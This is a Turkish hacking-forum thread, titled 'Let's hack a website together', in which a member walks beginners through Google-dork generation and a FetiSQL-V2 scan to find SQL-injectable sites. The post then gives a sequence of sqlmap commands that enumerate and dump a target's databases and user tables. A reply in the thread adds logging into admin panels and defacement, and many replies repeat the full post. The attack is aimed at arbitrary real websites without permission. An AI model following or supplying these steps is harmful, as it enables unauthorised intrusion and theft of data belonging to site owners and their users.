Birlikte Web Site Hackleyelim!!!

.net :) · 4 Mar 2023

Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?

Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:

site: belirli bir web sitesinde arama yapmak için kullanılır
inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
intitle: belirli bir başlığı olan sayfaları listeler
filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
link: belirli bir URL'ye bağlantı veren sayfaları listeler

Otomatik Olarak Zaafiyetli Google Dork Oluşturma

Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:

git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla

Kod:

cd Dork-Studio/

Kod:

python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:

python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir

şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek

burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır

Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır

Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla

Kod:

git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py

Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.

Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs

(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db

yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.

şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz

çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi

çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump

ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz

Önemli Bilgilendirmeler

1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı

Umarım Faydalı Olabilmişimdir

Venom.20 · 4 Mar 2023

Okurken NASA’yı hacklendim

Güzel içerik olmuş Ellerinize sağlık

Liprow · 4 Mar 2023

"1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur."

Emin misin?

.net :) · 4 Mar 2023

LᎥρɾσɯ' Alıntı:
"1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur."

Emin misin?

Hangi konuda kıralamiyacak hash konusundamı 😅

Enistein · 4 Mar 2023

Eline sağlık

Liprow · 4 Mar 2023

.net :)' Alıntı:
Hangi konuda kıralamiyacak hash konusundamı 😅

Bcrypt olan bir hash'ı 12 defa rotate ettiğini düşün?

.net :) · 4 Mar 2023

LᎥρɾσɯ' Alıntı:
Bcrypt olan bir hash'ı 12 defa rotate ettiğini düşün?

Haklısınız 😅

Blwe · 4 Mar 2023

Elinize sağlık, lâkin ben burada site hackleme göremedim. Sql açığından faydalanarak, site database'e girmeyi gördüm.

.net :) · 4 Mar 2023

Blwe' Alıntı:
Elinize sağlık, lâkin ben burada site hackleme göremedim. Site database çekmeyi gördüm.

Öncelikle Database çekip dump etmekte bir hack sayılır daha sonra ise zaten admin şifresi db de mevcut ise yapacağı tek şey admin panel bulup login olmak ve gerisi ona kalmış son olarakta bazı problemlerden dolayı istediğim kadar detaylı anlatamadım yoksa admin panelde upload olmadan index atmayı da gösterecektim normalde

Blwe · 4 Mar 2023

.net :)' Alıntı:
Öncelikle Database çekip dump etmekte bir hack sayılır daha sonra ise zaten admin şifresi db de mevcut ise yapacağı tek şey admin panel bulup login olmak ve gerisi ona kalmış son olarakta bazı problemlerden dolayı istediğim kadar detaylı anlatamadım yoksa admin panelde upload olmadan index atmayı da gösterecektim normalde

Sql açığını tool yardımı ile sömürüp database'i dump etmek pek hack sayılmaz bana göre. Lâkin size göre sayılıyor ise, sizin düşüncenize bir şey diyemem. Yinede konunuzu beğendim, çünkü ortada heves kullanılarak hazırlanmış bir emek var. Emeğe saygı duyarım, başarılarınız daim olsun.

.net :) · 4 Mar 2023

Blwe' Alıntı:
Sql açığını tool yardımı ile sömürüp database'i dump etmek pek hack sayılmaz bana göre. Lâkin size göre sayılıyor ise, sizin düşüncenize bir şey diyemem. Yinede konunuzu beğendim, çünkü ortada heves kullanılarak hazırlanmış bir emek var. Emeğe saygı duyarım, başarılarınız daim olsun.

Dediğim bazı teknik aksaklıklardan dolayı malesef şimdilik bu kadar yapabildim yoksa index atmayı falan mutlaka ekliyecektim
Teşekkür ederim sizede başarılar 😇

Yusuf Walker · 4 Mar 2023

Eline emeğine sağlık dostum

azx5 · 4 Mar 2023

sqlmi kaldı artık owaspa farklı açıklara yönelin eline sağlık

operatorx · 4 Mar 2023

elinize sağlık hocam

Suppressor · 4 Mar 2023

.net :)' Alıntı:
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?

Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:

site: belirli bir web sitesinde arama yapmak için kullanılır

inurl: URL'lerin belirli bir kelimeyi içermesini sağlar

intitle: belirli bir başlığı olan sayfaları listeler

filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)

link: belirli bir URL'ye bağlantı veren sayfaları listeler

Otomatik Olarak Zaafiyetli Google Dork Oluşturma

Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:

git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla

Kod:

cd Dork-Studio/

Kod:

python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:

python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir

şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek

burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır

Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır

Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla

Kod:

git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py

Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.

Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs

(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db

yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.

şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz

çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi

çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump

ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz

Önemli Bilgilendirmeler

1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı

Umarım Faydalı Olabilmişimdir

Eline sağlık.

raunchytve · 4 Mar 2023

Eline Sağlık

AwiR · 4 Mar 2023

.net :)' Alıntı:
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?

Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:

site: belirli bir web sitesinde arama yapmak için kullanılır

inurl: URL'lerin belirli bir kelimeyi içermesini sağlar

intitle: belirli bir başlığı olan sayfaları listeler

filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)

link: belirli bir URL'ye bağlantı veren sayfaları listeler

Otomatik Olarak Zaafiyetli Google Dork Oluşturma

Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:

git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla

Kod:

cd Dork-Studio/

Kod:

python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:

python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir

şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek

burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır

Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır

Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla

Kod:

git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py

Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.

Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs

(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db

yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.

şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz

çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi

çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump

ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz

Önemli Bilgilendirmeler

1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı

Umarım Faydalı Olabilmişimdir

Eline Sağlık Güzel Çalışma Olmuş.

taklan_br_12 · 4 Mar 2023

.net :)' Alıntı:
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?

Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:

site: belirli bir web sitesinde arama yapmak için kullanılır

inurl: URL'lerin belirli bir kelimeyi içermesini sağlar

intitle: belirli bir başlığı olan sayfaları listeler

filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)

link: belirli bir URL'ye bağlantı veren sayfaları listeler

Otomatik Olarak Zaafiyetli Google Dork Oluşturma

Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:

git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla

Kod:

cd Dork-Studio/

Kod:

python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:

python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir

şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek

burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır

Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır

Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla

Kod:

git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py

Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.

Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs

(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db

yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.

şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz

çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi

çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için

Kod:

sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump

ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz

Önemli Bilgilendirmeler

1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı

Umarım Faydalı Olabilmişimdir

Elinize sağlık hocam

.net :) · 4 Mar 2023

Hepinize teşekkür ederim

MGALIDER™ · 4 Mar 2023

LᎥρɾσɯ' Alıntı:
Bcrypt olan bir hash'ı 12 defa rotate ettiğini düşün?

ben 2048 gördüm o günden sonra bir daha görmek istemiyorum

Birlikte Web Site Hackleyelim!!!

Anka Underground Team

Katılımcı Üye

Üye

Anka Underground Team

Moderatör

Üye

Anka Underground Team

Moderasyon Çaylak

Anka Underground Team

Moderasyon Çaylak

Anka Underground Team

Basın&Medya Ekibi Asistanı

Üye

Üye

Anka Underground Team

Üye

Katılımcı Üye

Katılımcı Üye

Anka Underground Team

Katılımcı Üye